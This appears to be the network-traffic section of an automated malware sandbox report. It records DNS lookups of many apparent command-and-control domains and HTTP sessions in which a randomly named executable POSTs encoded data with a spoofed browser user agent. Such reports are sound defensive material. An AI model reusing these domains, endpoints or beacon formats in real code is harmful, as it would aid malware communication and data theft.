                                                                                      Nov 13, 2024 09:28:59.817758083 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.822690964 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:29:05.166141987 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.171087980 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:05.171291113 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.187763929 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.192738056 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.128611088 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.175662994 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:06.310815096 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.311005116 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:06.751373053 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.758099079 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.763580084 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:07.763705015 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.783067942 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.791517019 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.728703022 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.769360065 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:08.911233902 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.911328077 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:09.285052061 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.305847883 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.310916901 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.310975075 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.320333958 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.325359106 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325368881 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325386047 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325393915 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325407982 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325417042 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325431108 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325438976 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325447083 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.276030064 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.316348076 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:11.459129095 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.459312916 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:11.831970930 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.850364923 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.855679989 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:12.855798006 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.864058971 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.868963957 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.811515093 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.863111973 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.993623018 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.993742943 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.994503021 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.999349117 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.027290106 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.032154083 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.032250881 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.046355009 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.051182985 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904666901 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904683113 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904719114 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:20.040349007 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:20.040384054 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:20.894490004 CET5912280192.168.2.4172.217.16.211
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 09:26:37.923608065 CET | 64978 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:26:38.223809004 CET | 53 | 64978 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:26:43.241071939 CET | 50470 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:26:43.852510929 CET | 53 | 50470 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:26:46.134974957 CET | 53 | 62155 | 162.159.36.2 | 192.168.2.4
Nov 13, 2024 09:26:46.775201082 CET | 53652 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:26:46.783221960 CET | 53 | 53652 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:26:59.662170887 CET | 52144 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:26:59.677223921 CET | 53 | 52144 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:27:12.960849047 CET | 61919 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:27:13.315387964 CET | 53 | 61919 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:27:27.037060022 CET | 52782 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:27:27.049427032 CET | 53 | 52782 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:27:40.349427938 CET | 56823 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:27:40.675170898 CET | 53 | 56823 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:27:55.271630049 CET | 50942 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:27:55.313754082 CET | 53 | 50942 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:28:08.678344965 CET | 58984 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:28:08.691365957 CET | 53 | 58984 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:28:22.836966991 CET | 50261 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:28:22.864558935 CET | 53 | 50261 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:28:36.850281954 CET | 55314 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:28:37.252989054 CET | 53 | 55314 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:28:51.084273100 CET | 59877 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:28:51.123131990 CET | 53 | 59877 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:29:04.836397886 CET | 63102 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:29:05.162887096 CET | 53 | 63102 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 09:29:19.008876085 CET | 52522 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 09:29:19.023835897 CET | 53 | 52522 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 09:26:37.923608065 CET | 192.168.2.4 | 1.1.1.1 | 0xb1 | Standard query (0) | www.jllllbx.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:26:43.241071939 CET | 192.168.2.4 | 1.1.1.1 | 0x7fcb | Standard query (0) | www.college-help.info | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:26:46.775201082 CET | 192.168.2.4 | 1.1.1.1 | 0x6d6f | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 13, 2024 09:26:59.662170887 CET | 192.168.2.4 | 1.1.1.1 | 0xdbe1 | Standard query (0) | www.binacamasala.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:12.960849047 CET | 192.168.2.4 | 1.1.1.1 | 0xfc14 | Standard query (0) | www.marketplacer.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:27.037060022 CET | 192.168.2.4 | 1.1.1.1 | 0xb652 | Standard query (0) | www.energyparks.net | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:40.349427938 CET | 192.168.2.4 | 1.1.1.1 | 0x55ca | Standard query (0) | www.yvrkp.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:55.271630049 CET | 192.168.2.4 | 1.1.1.1 | 0xacfe | Standard query (0) | www.flikka.site | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:08.678344965 CET | 192.168.2.4 | 1.1.1.1 | 0xed5b | Standard query (0) | www.ladylawher.shop | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:22.836966991 CET | 192.168.2.4 | 1.1.1.1 | 0x1837 | Standard query (0) | www.primeproperty.property | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:36.850281954 CET | 192.168.2.4 | 1.1.1.1 | 0x5629 | Standard query (0) | www.kghjkx.xyz | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:51.084273100 CET | 192.168.2.4 | 1.1.1.1 | 0x9b79 | Standard query (0) | www.iuyi542.xyz | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:29:04.836397886 CET | 192.168.2.4 | 1.1.1.1 | 0x120c | Standard query (0) | www.neg21.top | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:29:19.008876085 CET | 192.168.2.4 | 1.1.1.1 | 0x4965 | Standard query (0) | www.digitaladpro.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 09:26:38.223809004 CET | 1.1.1.1 | 192.168.2.4 | 0xb1 | Name error (3) | www.jllllbx.top | none | none | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:26:43.852510929 CET | 1.1.1.1 | 192.168.2.4 | 0x7fcb | No error (0) | www.college-help.info |  | 38.88.82.56 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:26:46.783221960 CET | 1.1.1.1 | 192.168.2.4 | 0x6d6f | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 13, 2024 09:26:59.677223921 CET | 1.1.1.1 | 192.168.2.4 | 0xdbe1 | No error (0) | www.binacamasala.com | binacamasala.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:26:59.677223921 CET | 1.1.1.1 | 192.168.2.4 | 0xdbe1 | No error (0) | binacamasala.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:26:59.677223921 CET | 1.1.1.1 | 192.168.2.4 | 0xdbe1 | No error (0) | binacamasala.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:13.315387964 CET | 1.1.1.1 | 192.168.2.4 | 0xfc14 | No error (0) | www.marketplacer.top |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:27.049427032 CET | 1.1.1.1 | 192.168.2.4 | 0xb652 | No error (0) | www.energyparks.net | energyparks.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:27:27.049427032 CET | 1.1.1.1 | 192.168.2.4 | 0xb652 | No error (0) | energyparks.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:27.049427032 CET | 1.1.1.1 | 192.168.2.4 | 0xb652 | No error (0) | energyparks.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:40.675170898 CET | 1.1.1.1 | 192.168.2.4 | 0x55ca | No error (0) | www.yvrkp.top |  | 104.21.14.183 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:40.675170898 CET | 1.1.1.1 | 192.168.2.4 | 0x55ca | No error (0) | www.yvrkp.top |  | 172.67.160.35 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:27:55.313754082 CET | 1.1.1.1 | 192.168.2.4 | 0xacfe | No error (0) | www.flikka.site |  | 67.223.117.142 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:08.691365957 CET | 1.1.1.1 | 192.168.2.4 | 0xed5b | No error (0) | www.ladylawher.shop | ladylawher.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:28:08.691365957 CET | 1.1.1.1 | 192.168.2.4 | 0xed5b | No error (0) | ladylawher.shop |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:08.691365957 CET | 1.1.1.1 | 192.168.2.4 | 0xed5b | No error (0) | ladylawher.shop |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:22.864558935 CET | 1.1.1.1 | 192.168.2.4 | 0x1837 | No error (0) | www.primeproperty.property | dns.webcake.io |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:28:22.864558935 CET | 1.1.1.1 | 192.168.2.4 | 0x1837 | No error (0) | dns.webcake.io |  | 113.20.119.31 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:37.252989054 CET | 1.1.1.1 | 192.168.2.4 | 0x5629 | No error (0) | www.kghjkx.xyz |  | 47.129.103.185 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:28:51.123131990 CET | 1.1.1.1 | 192.168.2.4 | 0x9b79 | No error (0) | www.iuyi542.xyz | iuyi542.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:28:51.123131990 CET | 1.1.1.1 | 192.168.2.4 | 0x9b79 | No error (0) | iuyi542.xyz |  | 38.47.237.27 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:29:05.162887096 CET | 1.1.1.1 | 192.168.2.4 | 0x120c | No error (0) | www.neg21.top | neg21.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:29:05.162887096 CET | 1.1.1.1 | 192.168.2.4 | 0x120c | No error (0) | neg21.top |  | 206.119.81.36 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 09:29:19.023835897 CET | 1.1.1.1 | 192.168.2.4 | 0x4965 | No error (0) | www.digitaladpro.shop | ghs.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 09:29:19.023835897 CET | 1.1.1.1 | 192.168.2.4 | 0x4965 | No error (0) | ghs.google.com |  | 172.217.16.211 | A (IP address) | IN (0x0001) | false
• www.college-help.info
• www.binacamasala.com
• www.marketplacer.top
• www.energyparks.net
• www.yvrkp.top
• www.flikka.site
• www.ladylawher.shop
• www.primeproperty.property
• www.kghjkx.xyz
• www.iuyi542.xyz
• www.neg21.top
• www.digitaladpro.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 38.88.82.56 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:26:43.877887011 CET | 531 | OUT | GET /fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
Host: www.college-help.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:26:44.568723917 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 13 Nov 2024 08:26:44 GMT
Server: Apache
Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
ETag: "49d-626426de29b28"
Accept-Ranges: bytes
Content-Length: 1181
Content-Type: text/html
Connection: close
Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 13, 2024 09:26:44.568779945 CET | 185 | IN | Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 58817 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:26:59.698765039 CET | 798 | OUT | POST /usv6/ HTTP/1.1
Host: www.binacamasala.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.binacamasala.com
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Referer: http://www.binacamasala.com/usv6/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLHN+Yhi8rQYz3Z9DsZCL9vcIiBeRzLKWHA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 58818 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:02.237179041 CET | 818 | OUT | POST /usv6/ HTTP/1.1
Host: www.binacamasala.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.binacamasala.com
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Referer: http://www.binacamasala.com/usv6/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmEYInnC3Sox1M7/vH7CAeyhWCN07Dr6m6myOlN60b1wsrc/0XpQmyqkrgC7RbohxjEO3XpuqvKUyFKahSe4h/JsR0QYsp7wf5bfoUbaVOCleffrgOBDaiJ6FW8hfDOBtzpX//wZ9ojcvv47/GXl+I3fcIrfQhUfDq/CM2IZOfKEoH0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 58819 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:04.784485102 CET | 10900 | OUT | POST /usv6/ HTTP/1.1
Host: www.binacamasala.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.binacamasala.com
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10299
Referer: http://www.binacamasala.com/usv6/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 58820 | 3.33.130.190 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:07.329001904 CET | 530 | OUT | GET /usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
Host: www.binacamasala.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:27:07.950499058 CET | 398 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 13 Nov 2024 08:27:07 GMT
Content-Type: text/html
Content-Length: 258
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 58822 | 194.58.112.174 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:13.340818882 CET | 798 | OUT | POST /xprp/ HTTP/1.1
Host: www.marketplacer.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.marketplacer.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Referer: http://www.marketplacer.top/xprp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=Yv4rZANXzXyi9vvEWrOIITW0HAlGAxs2alMAVYo4KqzRhKITUZ+3vCQmceOFz5sgOCadwIs1xZ2d7OEEZHgvvYXFdjewD9wnYEgfseg+v+10onoRpJL2FNhRL/G4JA4LBLd5I99eHDNwqQs2pv2uQY2yuSRhC/FSR3vQ/tvTqOFOuiwYvfJ0Gqjyq2TLz9dwpQ==
Nov 13, 2024 09:27:14.243679047 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:27:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 58838 | 194.58.112.174 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:15.884852886 CET | 818 | OUT | POST /xprp/ HTTP/1.1
Host: www.marketplacer.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.marketplacer.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Referer: http://www.marketplacer.top/xprp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4XRhuMTVY+3qCQmEuOEuJs7OCXqwIg1xaKd7L4EY1IouIX9VDeIMdwnYEgfsawAv+t0oTsRroL5GNhSCfG4ew4PBLdbI/J0HGBwqUo2u9exZY20gyQpRs8WcGPZy9DfqcFdmE9C+uojUqHB3xa/++g5yYAQxG79lW2UZSf9SS1zCAU=
Nov 13, 2024 09:27:16.921195984 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Nov 13, 2024 09:27:16.921237946 CET | 212 | IN | Data Raw: (hex dump omitted)
Nov 13, 2024 09:27:16.921266079 CET | 1236 | IN | Data Raw: (hex dump omitted)
Nov 13, 2024 09:27:16.921298027 CET | 212 | IN | Data Raw: (hex dump omitted)
Nov 13, 2024 09:27:16.921334982 CET | 646 | IN | Data Raw: (hex dump omitted)
Nov 13, 2024 09:27:16.922039986 CET | 646 | IN | Data Raw: (hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 58854 | 194.58.112.174 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:27:18.449749947 CET | 10900 | OUT | POST /xprp/ HTTP/1.1
Host: www.marketplacer.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.marketplacer.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10299
Referer: http://www.marketplacer.top/xprp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:27:19.306732893 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:27:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Nov 13, 2024 09:27:19.306802034 CET | 1236 | IN | Data Raw: (hex dump omitted)
